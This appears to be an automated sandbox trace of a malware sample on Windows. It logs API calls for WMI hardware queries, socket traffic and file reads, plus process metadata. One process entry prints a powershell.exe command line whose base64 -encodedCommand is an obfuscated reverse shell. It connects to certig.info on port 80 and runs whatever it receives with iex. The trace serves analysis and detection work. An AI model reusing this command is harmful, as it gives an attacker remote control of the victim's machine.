	[0222.397] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3b, varVal2=0x0), pType=0x1c68ccdc*=3, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0222.397] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__DERIVATION", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b88be10*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b867790, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c68ccdc*=8200, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0222.397] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__SERVER", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0222.397] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0222.397] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0222.397] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0222.398] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__PATH", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0222.398] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x48
	[0222.398] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc380f0, puCount=0x1c68cd80 | out: puCount=0x1c68cd80*=0x2) returned 0x0
	[0222.398] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cd80*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd80*=0x17, pszText=0x0) returned 0x0
	[0222.398] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cd80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.398] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="Description", lFlags=0, pVal=0x1c68cd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd6c*=0, plFlavor=0x1c68cd68*=0 | out: pVal=0x1c68cd70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NVIDIA GeForce 840M", varVal2=0x0), pType=0x1c68cd6c*=8, plFlavor=0x1c68cd68*=32) returned 0x0
	[0222.398] SysStringLen (param_1="NVIDIA GeForce 840M") returned 0x13
	[0222.398] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="Description", lFlags=0, pVal=0x1c68cfa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cf9c*=8, plFlavor=0x1c68cf98*=32 | out: pVal=0x1c68cfa0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NVIDIA GeForce 840M", varVal2=0x0), pType=0x1c68cf9c*=8, plFlavor=0x1c68cf98*=32) returned 0x0
	[0222.398] SysStringLen (param_1="NVIDIA GeForce 840M") returned 0x13
	[0222.400] send (s=0x408, buf=0x3096410*, len=176, flags=0) returned 176
	[0222.538] recv (in: s=0x408, buf=0x2f36670, len=502, flags=0 | out: buf=0x2f36670*) returned 24
	[0222.544] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0222.545] send (s=0x408, buf=0x30a4128*, len=20, flags=0) returned 20
	[0222.546] recv (s=0x408, buf=0x2f36670, len=502, flags=0) 

Thread:
	id = 169
	os_tid = 0x73c


Thread:
	id = 171
	os_tid = 0x760


Thread:
	id = 177
	os_tid = 0xbc8


Thread:
	id = 231
	os_tid = 0x5e4


Thread:
	id = 252
	os_tid = 0xc10


Thread:
	id = 255
	os_tid = 0xc1c


Thread:
	id = 287
	os_tid = 0xc54


Thread:
	id = 293
	os_tid = 0xc74

	[0216.422] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0216.425] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1ee38, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1ee38*=0x1e, lpOverlapped=0x0) returned 1
	[0217.005] SetEvent (hEvent=0x4e8) returned 1
	[0217.005] SetEvent (hEvent=0x4f0) returned 1
	[0217.005] SetEvent (hEvent=0x4e8) returned 1
	[0217.005] SetEvent (hEvent=0x4f0) returned 1
	[0217.006] SetEvent (hEvent=0x4e8) returned 1
	[0217.006] SetEvent (hEvent=0x4f0) returned 1
	[0217.006] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1edf8*=0x2f, lpOverlapped=0x0) returned 1
	[0217.572] SetEvent (hEvent=0x4e8) returned 1
	[0217.572] SetEvent (hEvent=0x4f0) returned 1
	[0217.573] SetEvent (hEvent=0x4e8) returned 1
	[0217.573] SetEvent (hEvent=0x4f0) returned 1
	[0217.573] SetEvent (hEvent=0x4e8) returned 1
	[0217.573] SetEvent (hEvent=0x4f0) returned 1
	[0217.573] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1edf8*=0x29, lpOverlapped=0x0) returned 1
	[0217.575] SetEvent (hEvent=0x4e8) returned 1
	[0217.575] SetEvent (hEvent=0x4f0) returned 1
	[0217.575] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1edf8*=0x45, lpOverlapped=0x0) returned 1
	[0217.576] SetEvent (hEvent=0x4e8) returned 1
	[0217.576] SetEvent (hEvent=0x4f0) returned 1
	[0217.576] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1edf8*=0x36, lpOverlapped=0x0) returned 1
	[0217.577] SetEvent (hEvent=0x4e8) returned 1
	[0217.577] SetEvent (hEvent=0x4f0) returned 1
	[0217.577] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1edf8*=0x36, lpOverlapped=0x0) returned 1
	[0218.097] SetEvent (hEvent=0x4e8) returned 1
	[0218.097] SetEvent (hEvent=0x4f0) returned 1
	[0218.097] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1edf8*=0x34, lpOverlapped=0x0) returned 1
	[0218.102] SetEvent (hEvent=0x4e8) returned 1
	[0218.102] SetEvent (hEvent=0x4f0) returned 1
	[0218.102] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1edf8*=0x43, lpOverlapped=0x0) returned 1
	[0218.106] SetEvent (hEvent=0x4e8) returned 1
	[0218.106] SetEvent (hEvent=0x4f0) returned 1
	[0218.106] SetEvent (hEvent=0x4e8) returned 1
	[0218.106] SetEvent (hEvent=0x4f0) returned 1
	[0218.107] SetEvent (hEvent=0x4e8) returned 1
	[0218.107] SetEvent (hEvent=0x4f0) returned 1
	[0218.107] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1edf8*=0x3b, lpOverlapped=0x0) returned 1
	[0218.113] SetEvent (hEvent=0x4e8) returned 1
	[0218.113] SetEvent (hEvent=0x4f0) returned 1
	[0218.113] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1edf8*=0x29, lpOverlapped=0x0) returned 1
	[0218.114] SetEvent (hEvent=0x4e8) returned 1
	[0218.114] SetEvent (hEvent=0x4f0) returned 1
	[0218.115] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1edf8*=0x37, lpOverlapped=0x0) returned 1
	[0218.117] SetEvent (hEvent=0x4e8) returned 1
	[0218.117] SetEvent (hEvent=0x4f0) returned 1
	[0218.117] SetEvent (hEvent=0x4e8) returned 1
	[0218.117] SetEvent (hEvent=0x4f0) returned 1
	[0218.117] SetEvent (hEvent=0x4e8) returned 1
	[0218.117] SetEvent (hEvent=0x4f0) returned 1
	[0218.117] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1edf8*=0x3b, lpOverlapped=0x0) returned 1
	[0218.120] SetEvent (hEvent=0x4e8) returned 1
	[0218.120] SetEvent (hEvent=0x4f0) returned 1
	[0218.120] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0*, lpNumberOfBytesRead=0x1cb1edf8*=0x29, lpOverlapped=0x0) returned 1
	[0218.122] SetEvent (hEvent=0x4e8) returned 1
	[0218.122] SetEvent (hEvent=0x4f0) returned 1
	[0218.122] ReadFile (in: hFile=0x4f4, lpBuffer=0x2fb68e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cb1edf8, lpOverlapped=0x0 | out: lpBuffer=0x2fb68e0, lpNumberOfBytesRead=0x1cb1edf8*=0x0, lpOverlapped=0x0) returned 0
	[0218.131] CoUninitialize () 

Thread:
	id = 296
	os_tid = 0xc84

	[0216.670] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0216.672] ReadFile (in: hFile=0x4fc, lpBuffer=0x2fb9a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cddeb18, lpOverlapped=0x0 | out: lpBuffer=0x2fb9a18, lpNumberOfBytesRead=0x1cddeb18*=0x0, lpOverlapped=0x0) returned 0
	[0218.133] SetEvent (hEvent=0x504) returned 1
	[0218.133] SetEvent (hEvent=0x4e8) returned 1
	[0218.133] SetEvent (hEvent=0x4f0) returned 1
	[0218.133] SetEvent (hEvent=0x508) returned 1
	[0218.133] CoUninitialize () 

Thread:
	id = 303
	os_tid = 0xca0


Thread:
	id = 306
	os_tid = 0xcac


Thread:
	id = 345
	os_tid = 0xd7c


Process:
	id = "11"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3640f000"
	os_pid = "0x708"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "9"
	os_parent_pid = "0x7cc"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGEAVwBaAHMAQwA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABwAE4ASQB1AEgAPQAoACQAYQBXAFoAcwBDAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABNAHkAUQBIAE8APQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABNAEYAcwBxAFYAPQAkAHAATgBJAHUASAAuAFIAZQBhAGQAKAAkAE0AeQBRAEgATwAsADAALAAkAE0AeQBRAEgATwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAFoAcgBrAHkAcQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQATQB5AFEASABPACwAMAAsACQATQBGAHMAcQBWACkAOwAkAGgAaQBoAG4AVAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAWgByAGsAeQBxACAAMgA+ACYAMQApACkAOwAkAHAATgBJAHUASAAuAFcAcgBpAHQAZQAoACQAaABpAGgAbgBUACwAMAAsACQAaABpAGgAbgBUAC4ATABlAG4AZwB0AGgAKQA7ACQAcABOAEkAdQBIAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABhAFcAWgBzAEMALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYQBXAFoAcwBDAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 146
	os_tid = 0x6a8

	[0127.885] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0128.902] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0128.902] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0128.902] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0128.902] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0131.257] GetVersionExW (in: lpVersionInformation=0x1cd980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cd980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0131.518] GetVersionExW (in: lpVersionInformation=0x1cd980*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cd980*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0131.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.536] GetVersionExW (in: lpVersionInformation=0x1cd6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cd6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0131.537] SetErrorMode (uMode=0x1) returned 0x1
	[0131.539] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cd850 | out: lpFileInformation=0x1cd850*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0131.540] SetErrorMode (uMode=0x1) returned 0x1
	[0131.545] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cdac0 | out: lpdwHandle=0x1cdac0) returned 0x94c
	[0131.548] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ce7d40 | out: lpData=0x2ce7d40) returned 1
	[0131.551] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cda38, puLen=0x1cda30 | out: lplpBuffer=0x1cda38*=0x2ce7ddc, puLen=0x1cda30) returned 1
	[0131.555] lstrlenW (lpString="䅁") returned 1
	[0131.666] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cd9a8, puLen=0x1cd9a0 | out: lplpBuffer=0x1cd9a8*=0x2ce7eb8, puLen=0x1cd9a0) returned 1
	[0131.667] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0131.670] CoTaskMemAlloc (cb=0x2e) returned 0x3eca30
	[0131.670] lstrcpyW (in: lpString1=0x3eca30, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0131.671] CoTaskMemFree (pv=0x3eca30) 
	[0131.672] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cd9a8, puLen=0x1cd9a0 | out: lplpBuffer=0x1cd9a8*=0x2ce7f0c, puLen=0x1cd9a0) returned 1
	[0131.672] lstrlenW (lpString="System.Management.Automation") returned 28
	[0131.672] CoTaskMemAlloc (cb=0x3c) returned 0x3ebe50
	[0131.672] lstrcpyW (in: lpString1=0x3ebe50, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0131.672] CoTaskMemFree (pv=0x3ebe50) 
	[0131.672] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cd9a8, puLen=0x1cd9a0 | out: lplpBuffer=0x1cd9a8*=0x2ce7f68, puLen=0x1cd9a0) returned 1
	[0131.672] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0131.672] CoTaskMemAlloc (cb=0x20) returned 0x3e3310
	[0131.672] lstrcpyW (in: lpString1=0x3e3310, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0131.672] CoTaskMemFree (pv=0x3e3310) 
	[0131.672] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cd9a8, puLen=0x1cd9a0 | out: lplpBuffer=0x1cd9a8*=0x2ce7fa8, puLen=0x1cd9a0) returned 1
	[0131.672] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0131.672] CoTaskMemAlloc (cb=0x44) returned 0x3ebe50
	[0131.672] lstrcpyW (in: lpString1=0x3ebe50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0131.672] CoTaskMemFree (pv=0x3ebe50) 
	[0131.672] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cd9a8, puLen=0x1cd9a0 | out: lplpBuffer=0x1cd9a8*=0x2ce8010, puLen=0x1cd9a0) returned 1
	[0131.672] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0131.672] CoTaskMemAlloc (cb=0x76) returned 0x37fca0
	[0131.672] lstrcpyW (in: lpString1=0x37fca0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0131.672] CoTaskMemFree (pv=0x37fca0) 
	[0131.672] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cd9a8, puLen=0x1cd9a0 | out: lplpBuffer=0x1cd9a8*=0x2ce80ac, puLen=0x1cd9a0) returned 1
	[0131.672] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0131.673] CoTaskMemAlloc (cb=0x44) returned 0x3ebe50
	[0131.673] lstrcpyW (in: lpString1=0x3ebe50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0131.673] CoTaskMemFree (pv=0x3ebe50) 
	[0131.673] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cd9a8, puLen=0x1cd9a0 | out: lplpBuffer=0x1cd9a8*=0x2ce8110, puLen=0x1cd9a0) returned 1
	[0131.673] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0131.673] CoTaskMemAlloc (cb=0x58) returned 0x3382a0
	[0131.673] lstrcpyW (in: lpString1=0x3382a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0131.673] CoTaskMemFree (pv=0x3382a0) 
	[0131.673] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cd9a8, puLen=0x1cd9a0 | out: lplpBuffer=0x1cd9a8*=0x2ce818c, puLen=0x1cd9a0) returned 1
	[0131.673] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0131.673] CoTaskMemAlloc (cb=0x20) returned 0x3e3310
	[0131.673] lstrcpyW (in: lpString1=0x3e3310, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0131.673] CoTaskMemFree (pv=0x3e3310) 
	[0131.673] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cd9a8, puLen=0x1cd9a0 | out: lplpBuffer=0x1cd9a8*=0x2ce7e34, puLen=0x1cd9a0) returned 1
	[0131.673] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0131.673] CoTaskMemAlloc (cb=0x66) returned 0x34c830
	[0131.673] lstrcpyW (in: lpString1=0x34c830, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0131.673] CoTaskMemFree (pv=0x34c830) 
	[0131.673] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cd9a8, puLen=0x1cd9a0 | out: lplpBuffer=0x1cd9a8*=0x0, puLen=0x1cd9a0) returned 0
	[0131.674] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cd9a8, puLen=0x1cd9a0 | out: lplpBuffer=0x1cd9a8*=0x0, puLen=0x1cd9a0) returned 0
